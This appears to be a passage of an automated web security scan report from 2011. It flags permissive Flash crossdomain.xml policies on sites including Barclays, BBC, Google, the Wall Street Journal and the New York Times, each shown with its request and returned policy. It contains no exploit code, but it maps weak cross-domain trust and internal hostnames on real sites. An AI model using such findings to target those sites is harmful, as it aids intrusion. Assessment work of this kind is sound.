6.25. http://apps.barclays.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://apps.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.barclays.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:00 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304418120720311; path=/; expires=Wed, 27-Apr-33 10:22:00 GMT
Last-Modified: Tue, 19 Oct 2010 11:18:27 GMT
Accept-Ranges: bytes
Content-Length: 2397
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*.mediaplex.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cache.cantos.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adtech.panthercustomer.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aka-cdn.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.a1767.g.akamai.net/v/1767/18689/7d/img-dc2.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.a248.e.akamai.net/v/248/18690/7d/img-dc2.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aka-cdn-ns.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.barclaysmicrosites.co.uk.lan" secure="false" />
...[SNIP]...
<allow-access-from domain="stage.clabs23.intranet.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="wa6p.wload.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fantasyleague.com" secure="false" />
...[SNIP]...

6.26. https://apps.barclays.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.barclays.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:56:22 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304427382843002; path=/; expires=Wed, 27-Apr-33 12:56:22 GMT
Last-Modified: Tue, 19 Oct 2010 11:18:27 GMT
Accept-Ranges: bytes
Content-Length: 2397
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*.mediaplex.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cache.cantos.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adtech.panthercustomer.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aka-cdn.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.a1767.g.akamai.net/v/1767/18689/7d/img-dc2.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.a248.e.akamai.net/v/248/18690/7d/img-dc2.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aka-cdn-ns.adtech.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.barclaysmicrosites.co.uk.lan" secure="false" />
...[SNIP]...
<allow-access-from domain="stage.clabs23.intranet.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="wa6p.wload.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.barclays.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fantasyleague.com" secure="false" />
...[SNIP]...

6.27. http://edge.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Apr 2011 00:39:48 GMT
ETag: "18e1d-14a-4a14edca27d00"
Content-Type: application/xml
Date: Tue, 03 May 2011 13:21:39 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

6.28. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=19
Expires: Tue, 03 May 2011 12:27:30 GMT
Date: Tue, 03 May 2011 12:27:11 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.29. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Tue, 03 May 2011 03:57:34 GMT
Expires: Wed, 04 May 2011 03:57:34 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 34549

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.30. http://ktbcare.hi5.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ktbcare.hi5.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ktbcare.hi5.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"414-1286911046000"
Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT
Content-Type: application/xml
Content-Length: 414
Date: Tue, 03 May 2011 13:24:13 GMT
Connection: keep-alive
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246bd1e3660;expires=Tue, 03-May-11 13:46:01 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.mysite.com -->
<cross-domain-policy>
<allow-access-from domain="*.hi5.com" />
<allow-access-from domain="hi5.com" />
<allow-access-from domain="x.mochiads.com" />
<allow-access-from domain="*.socialmoraygames.com"/>
...[SNIP]...

6.31. http://news.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=10
Content-Type: text/xml
Date: Tue, 03 May 2011 13:24:15 GMT
Keep-Alive: timeout=10, max=788
Expires: Tue, 03 May 2011 13:24:25 GMT
Connection: close
Set-Cookie: BBC-UID=14ad6c50b081dfaf41926aa1515bbacec024438e50f051ca543bcaf441ac625c0; expires=Wed, 02-May-12 13:24:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14ad6c50b081dfaf41926aa1515bbacec024438e50f051ca543bcaf441ac625c0; expires=Wed, 02-May-12 13:24:15 GMT; path=/; domain=bbc.co.uk;
Last-Modified: Wed, 20 Apr 2011 09:02:26 GMT
Content-Length: 1081

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.32. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=112
Expires: Tue, 03 May 2011 12:28:53 GMT
Date: Tue, 03 May 2011 12:27:01 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.33. http://online.wsj.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:18:09 GMT
Accept-Ranges: bytes
Content-Length: 3499
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
    <allow-access-from domain="m.doubleclick.net"/>
    <allow-access-from domain="*.dowjonesonline.com"/>
    <allow-access-from domain="www.dowjonesonline.com"/>
    <allow-access-from domain="a.marketwatch.com"/>
    <allow-access-from domain="*.marketwatch.com"/>
    <allow-access-from domain="www.akamai.com"/>
    <allow-access-from domain="*.akamai.com"/>
    <allow-access-from domain="www.wsj.com"/>
    <allow-access-from domain="*.wsj.com"/>
    <allow-access-from domain="s.dev.wsj.com"/>
    <allow-access-from domain="idev.online.wsj.com"/>
    <allow-access-from domain="s.wsjsat.dowjones.net"/>
    <allow-access-from domain="s.s.dev.wsj.com"/>
<allow-access-from domain="reno.wsjqa.dowjones.net"/>
    <allow-access-from domain="*.online.wsj.com"/>
...[SNIP]...
<allow-access-from domain="quotes.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="public.wsj.com"/>
    <allow-access-from domain="*.public.wsj.com"/>
<allow-access-from domain="www.barrons.com"/>
    <allow-access-from domain="*.barrons.com"/>
...[SNIP]...
<allow-access-from domain="idev.online.barrons.com"/>
    <allow-access-from domain="*.online.barrons.com"/>
    <allow-access-from domain="online.barrons.com"/>
    <allow-access-from domain="public.barrons.com"/>
    <allow-access-from domain="*.public.barrons.com"/>
    <allow-access-from domain="*.aol.com"/>
    <allow-access-from domain="*.brightcove.com"/>
    <allow-access-from domain="creatives.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="wsjdigital.com"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dowjones.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="online.s.dev.wsj.com"/>
    <allow-access-from domain="quotes.s.dev.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="polls.s.dev.wsj.com"/>
<allow-access-from domain="blogs.s.dev.wsj.com"/>
<allow-access-from domain="triplewebdesign.com"/>
<allow-access-from domain="ingyournumber.com"/>
   <allow-access-from domain="*.ingyournumber.com"/>
<allow-access-from domain="*.issuu.com"/>
   <allow-access-from domain="static.issuu.com"/>
    <allow-access-from domain="professional.s.dev.wsj.com"/>
    <allow-access-from domain="*.dartmotif.com"/>
    <allow-access-from domain="wsjradio.com"/>
    <allow-access-from domain="*.wsjradio.com"/>
    <allow-access-from domain="www.wsjradio.com"/>
    <allow-access-from domain="*.eyereturn.com"/>
<allow-access-from domain="fxtrader.l.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.f.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.s.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.dowjones.com"/>
    <allow-access-from domain="dowjones.visualla.com"/>
...[SNIP]...

6.34. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Tue, 03 May 2011 01:08:03 GMT
Expires: Wed, 04 May 2011 01:08:03 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 44720

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.35. http://picasaweb.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Wed, 04 May 2011 13:23:21 GMT
Date: Tue, 03 May 2011 13:23:21 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

6.36. http://topics.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: topics.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 13:27:20 GMT
Content-length: 464
Content-type: text/xml
Last-modified: Wed, 10 Mar 2010 02:18:30 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.*.tremormedia.com" />
   <allow-access-from domain="*.tremormedia.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.37. http://video.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
